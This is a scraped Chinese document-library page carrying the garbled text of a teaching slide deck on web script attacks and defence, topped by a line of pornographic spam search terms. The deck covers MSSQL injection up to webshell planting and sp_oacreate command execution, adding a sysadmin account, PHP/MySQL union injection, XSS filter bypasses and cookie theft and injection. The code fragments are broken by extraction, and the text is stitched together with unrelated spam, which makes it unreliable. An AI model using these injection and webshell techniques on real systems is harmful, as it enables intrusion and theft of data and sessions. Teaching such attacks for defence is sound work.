freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

網(wǎng)絡(luò)腳本攻擊與防御ppt(文件)

 

【正文】 戶(hù)密碼,登陸后臺(tái)再通過(guò)上傳或者寫(xiě)入配置文件等方法得到 webshell,如前介紹。exec ?echo ^^%eval request(chr(35))%^^ D:\WEB\?。 此方法用在可以得到命令回顯的情況下,用ipconfig命令得到 ip地址 方法二: 。 db_owner權(quán)限下的注入 直接獲取 webshell的方法: WEB路徑 在 db_owner權(quán)限下要得到 WEB路徑基本只有兩個(gè)辦法: ? 利用擴(kuò)展存儲(chǔ)過(guò)程 xp_regread,只要有 Public權(quán)限就可以運(yùn)行它。這個(gè)擴(kuò)展存儲(chǔ)過(guò)程同樣只需要 Public權(quán)限就可以運(yùn)行它,它有三個(gè)參數(shù),第一個(gè)參數(shù)是路徑,第二個(gè)是目錄深度,第三個(gè)表示是否列出文件。insert into tmp exec master..xp_dirtree ?d:\?,1,1 ? 獲取第一條數(shù)據(jù): and (select name from tmp where id=1)1 ? 這樣通過(guò)遞增 ID就可以把所有目錄讀取出來(lái),一定可以找出 web目錄。如果先在數(shù)據(jù)庫(kù)之中插入構(gòu)造的 ASP木馬語(yǔ)句,然后再把數(shù)據(jù)庫(kù)備份到磁盤(pán),命名為“ ”,就可以得到 webshell了。Sp_OACreate39。Sp_OAGetErrorInfo39。Sp_OAMethod39。Sp_OAStop39。Xp_regdeletekey39。Xp_regenumvalues39。Xp_regremovemultistring39。? 如果提示找不到 ,那就用webshell上傳 ,再執(zhí)行: Exec 39。 如果還是不成功,可以再?lài)L試加上 SQL帳戶(hù): exec xxx exec xxx,sysadmin 然后用 SQL查詢(xún)分析器連接上去再執(zhí)行: declare cmd INT exec sp_oacreate 39。,null,39。,39。,cmd output exec sp_oamethod cmd,39。,39。 2 PHP注入 ? PHP+MySQL注入的一些特征 ?Version4以下的版本不支持子語(yǔ)句。 ? 聯(lián)合查詢(xún)功能 。如過(guò)濾了空格可以用 /**/代替。 ? ,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在 2字段顯示出字段內(nèi)容則存在些字段。屬于被動(dòng)攻擊。 跨站 Script攻擊范例 ? form action= ? input type=text name=a size=40 ? input type=submit value=提交 ? /form ? % ? str=request(a) ? str ? % 跨站盜取 cookie 什么是 cookie? ? Cookie,有時(shí)也用其復(fù)數(shù)形式 Cookies,指某些網(wǎng)站為了辨別用戶(hù)身份、進(jìn)行 session跟蹤而儲(chǔ)存在用戶(hù)本地終端上的數(shù)據(jù)(通常經(jīng)過(guò)加密)。aamp。 解決方案 1: 過(guò)濾用戶(hù)提交的變量中的 和 ,轉(zhuǎn)換成 16進(jìn)制 str=replace(str,amp。) 2. 測(cè)試: javascript:alert(饒過(guò)第一個(gè)限制! ) 解決方案 2: 替換“ :”為“:” str=replace(str,:,: ) 3. 測(cè)試: javascriptamp。,amp。) 測(cè)試用例: , ? form action= ? input type=text name=a size=40 ? input type=submit value=提交 ? /form ? % ? str=request(a) ? str=replace(str,amp。) ? str=replace(str,:,: ) ? str=replace(str,amp。x20。 expires = DATE。 = amp。 = amp。 ?然后再訪(fǎng)問(wèn)測(cè)試頁(yè)面 ,讀出cookie的值。owen ?將參數(shù)直接帶入查詢(xún) sql,conn,1,1 title=rsnews(title) if and then (數(shù)據(jù)庫(kù)出錯(cuò) ) else ? request獲取變量的方式: 的是 post數(shù)據(jù), get數(shù)據(jù), cookie中的數(shù)據(jù)。 ? cookies的注入語(yǔ)句 :alert(=“id=”+escape(“這就是asp? id=xx后面 xx代表的數(shù)值 ) and (這里是注入攻擊代碼 )”))。彈出框表明cookie修改成功。 構(gòu)造 cookie實(shí)現(xiàn)注入 舉例 ?首先提交正常的新聞頁(yè)面 ?接著在瀏覽器輸入javascript:alert(=“id=”+escape(“39 and 1=1”))。 利用 JavaScript來(lái)設(shè)置 cookie: 利用 javascript,可以在本地瀏覽器中設(shè)置cookie格式: name=value的屬性是指定cookie數(shù)據(jù)項(xiàng)的名稱(chēng) ,value是該名稱(chēng)對(duì)應(yīng)的值 ,它是一個(gè)字符串。 Cookie注入 再讀源碼: %owen=request(id)% ?獲取參數(shù) ID,但是沒(méi)限制來(lái)源(關(guān)鍵) Set rsnews=() sql=update news set hits=hits+1 where id=amp。 。 。 domain = DOMAIN_NAME。stramp。x26。) ? str=replace(str,amp。) 4. 測(cè)試: onerror=alert(再次饒過(guò)驗(yàn)證 ) 解決方案 4: 破壞形成事件機(jī)制的條件,轉(zhuǎn)換掉提交過(guò)來(lái)的空格字符 str=replace(str, ,amp。58是“ :”的十進(jìn)制格式 解決方案 3: 過(guò)濾 ASC字符的轉(zhuǎn)換代碼“ amp。) str=replace(str,amp。?msg=39。 ? 作用: 服務(wù)器可以利用 Cookies包含信息的任意
點(diǎn)擊復(fù)制文檔內(nèi)容
教學(xué)課件相關(guān)推薦
文庫(kù)吧 www.dybbs8.com
備案圖鄂ICP備17016276號(hào)-1